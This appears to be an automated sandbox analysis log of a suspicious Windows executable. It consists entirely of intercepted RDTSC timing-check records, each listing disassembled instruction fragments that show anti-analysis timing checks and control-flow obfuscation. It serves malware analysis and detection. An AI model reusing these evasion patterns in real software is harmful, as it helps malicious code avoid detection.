Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1714826 second address: 171485C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FC7F4B4AE78h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 jns 00007FC7F4B4AE76h 0x0000002e pop edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1716997 second address: 171699B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 171699B second address: 17169C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 mov esi, dword ptr [ebp+12A22AEEh] 0x0000000e mov dword ptr [ebp+12A21DC8h], ebx 0x00000014 push 00000000h 0x00000016 mov di, si 0x00000019 push 00000000h 0x0000001b xor edi, 5B7E6190h 0x00000021 xchg eax, ebx 0x00000022 push esi 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17169C1 second address: 17169D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jo 00007FC7F4EE1C46h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 171A918 second address: 171A91C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 171A91C second address: 171A922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1721B1F second address: 1721B29 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC7F4B4AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1721B29 second address: 1721B34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC7F4EE1C46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1721B34 second address: 1721B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FC7F4B4AE78h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov edi, 4CE31908h 0x0000002b push 00000000h 0x0000002d and ebx, 31971117h 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jnl 00007FC7F4B4AE76h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1721B79 second address: 1721B83 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC7F4EE1C46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1721D6C second address: 1721D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1722BD5 second address: 1722BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1722BD9 second address: 1722BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1724AE3 second address: 1724AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1724AE7 second address: 1724AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1722BDD second address: 1722C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FC7F4EE1C48h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 push dword ptr fs:[00000000h] 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f call 00007FC7F4EE1C4Eh 0x00000034 or bh, FFFFFFD1h 0x00000037 pop ebx 0x00000038 mov eax, dword ptr [ebp+12A209A1h] 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007FC7F4EE1C48h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 0000001Bh 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 push FFFFFFFFh 0x0000005a movsx edi, si 0x0000005d nop 0x0000005e push edi 0x0000005f push eax 0x00000060 push edx 0x00000061 push ecx 0x00000062 pop ecx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1724AED second address: 1724AF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1724AF3 second address: 1724AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1725B6B second address: 1725B85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1724C16 second address: 1724C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7F4EE1C56h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1725B85 second address: 1725B8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1724C30 second address: 1724C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1725B8C second address: 1725B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007FC7F4B4AE7Eh 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1725B9D second address: 1725BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 mov bx, D041h 0x0000000a push 00000000h 0x0000000c mov dword ptr [ebp+12BCA7DFh], edx 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+12B9EB29h], ebx 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1725BBD second address: 1725BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1725D35 second address: 1725D42 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC7F4EE1C46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1725D42 second address: 1725DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7F4B4AE88h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c and ebx, 37C598EDh 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FC7F4B4AE78h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 js 00007FC7F4B4AE79h 0x00000039 movzx ebx, si 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 jo 00007FC7F4B4AE87h 0x00000049 call 00007FC7F4B4AE7Ah 0x0000004e jnp 00007FC7F4B4AE76h 0x00000054 pop edi 0x00000055 mov eax, dword ptr [ebp+12A21451h] 0x0000005b mov di, 8794h 0x0000005f push FFFFFFFFh 0x00000061 mov dword ptr [ebp+12A225CFh], eax 0x00000067 mov ebx, ecx 0x00000069 nop 0x0000006a pushad 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1725DCB second address: 1725DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC7F4EE1C46h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7F4EE1C53h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1725DEB second address: 1725DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 172AA32 second address: 172AA3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 172AA3C second address: 172AADB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FC7F4B4AE78h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+12A22A0Ah] 0x0000002d jp 00007FC7F4B4AE7Bh 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007FC7F4B4AE78h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f call 00007FC7F4B4AE87h 0x00000054 mov ebx, dword ptr [ebp+12A22912h] 0x0000005a pop edi 0x0000005b movsx edi, di 0x0000005e push 00000000h 0x00000060 cmc 0x00000061 xchg eax, esi 0x00000062 push eax 0x00000063 push edx 0x00000064 js 00007FC7F4B4AE78h 0x0000006a push ebx 0x0000006b pop ebx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 172AADB second address: 172AAFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007FC7F4EE1C46h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC7F4EE1C52h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1729AED second address: 1729AF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1727CC6 second address: 1727CCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1728BBD second address: 1728BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1729AF2 second address: 1729B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC7F4EE1C46h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 172BB47 second address: 172BB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 172AC1E second address: 172AC22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1728BC2 second address: 1728BDE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FC7F4B4AE7Ah 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 172AC22 second address: 172AC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC7F4EE1C50h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 172BD07 second address: 172BD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 172DB44 second address: 172DB49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 172CCB6 second address: 172CCBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 172DB49 second address: 172DB4E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 172CCBA second address: 172CCC4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC7F4B4AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 172CCC4 second address: 172CD56 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FC7F4EE1C4Ah 0x00000010 jnl 00007FC7F4EE1C4Ch 0x00000016 mov edi, dword ptr [ebp+12A22A0Eh] 0x0000001c push dword ptr fs:[00000000h] 0x00000023 sub dword ptr [ebp+12A22CC7h], ebx 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 xor edi, dword ptr [ebp+12A21A1Ah] 0x00000036 mov eax, dword ptr [ebp+12A203E5h] 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007FC7F4EE1C48h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 0000001Bh 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 jmp 00007FC7F4EE1C55h 0x0000005b push FFFFFFFFh 0x0000005d mov edi, 30EC2AFAh 0x00000062 xor bx, 64BBh 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b jbe 00007FC7F4EE1C46h 0x00000071 pushad 0x00000072 popad 0x00000073 popad 0x00000074 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 172DC90 second address: 172DC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 172DC94 second address: 172DCB7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC7F4EE1C46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC7F4EE1C57h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 172EC15 second address: 172ECA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 sub ebx, 1DE0A5E6h 0x0000000e push dword ptr fs:[00000000h] 0x00000015 jbe 00007FC7F4B4AE79h 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007FC7F4B4AE78h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 0000001Bh 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c mov ebx, dword ptr [ebp+12A21CE1h] 0x00000042 mov eax, dword ptr [ebp+12A216ADh] 0x00000048 add dword ptr [ebp+12A21827h], edi 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push edi 0x00000053 call 00007FC7F4B4AE78h 0x00000058 pop edi 0x00000059 mov dword ptr [esp+04h], edi 0x0000005d add dword ptr [esp+04h], 00000017h 0x00000065 inc edi 0x00000066 push edi 0x00000067 ret 0x00000068 pop edi 0x00000069 ret 0x0000006a jnl 00007FC7F4B4AE7Eh 0x00000070 or edi, dword ptr [ebp+12BA4ABEh] 0x00000076 nop 0x00000077 push ecx 0x00000078 push esi 0x00000079 push eax 0x0000007a push edx 0x0000007b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17393CF second address: 17393D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17393D3 second address: 17393D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17393D7 second address: 17393ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7F4EE1C50h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17393ED second address: 17393F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17393F3 second address: 173941E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4EE1C4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC7F4EE1C55h 0x00000010 ja 00007FC7F4EE1C46h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17400FD second address: 1740105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1740105 second address: 1740137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 jmp 00007FC7F4EE1C55h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC7F4EE1C51h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1740137 second address: 1740188 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC7F4B4AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FC7F4B4AE7Bh 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 pushad 0x00000018 jmp 00007FC7F4B4AE85h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FC7F4B4AE89h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1740188 second address: 174019C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jg 00007FC7F4EE1C4Eh 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17402EE second address: 174031D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7F4B4AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007FC7F4B4AE76h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174031D second address: 1740333 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7F4EE1C52h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1740333 second address: 1740364 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jno 00007FC7F4B4AE8Dh 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1740364 second address: 1740391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jo 00007FC7F4EE1C46h 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC7F4EE1C57h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1740391 second address: 1740397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1744D99 second address: 1744DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC7F4EE1C54h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1744DB3 second address: 1744DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7F4B4AE89h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1744DD0 second address: 1744DEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jng 00007FC7F4EE1C46h 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FC7F4EE1C46h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1744DEB second address: 1744DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1743B52 second address: 1743B80 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC7F4EE1C46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC7F4EE1C4Fh 0x00000011 jmp 00007FC7F4EE1C53h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1744594 second address: 174459F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FC7F4B4AE76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 174459F second address: 17445BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7F4EE1C50h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e js 00007FC7F4EE1C46h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 17445BE second address: 17445C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1744860 second address: 174487B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7F4EE1C57h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pCElIX19tu.exeRDTSC instruction interceptor: First address: 1744C45 second address: 1744C49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
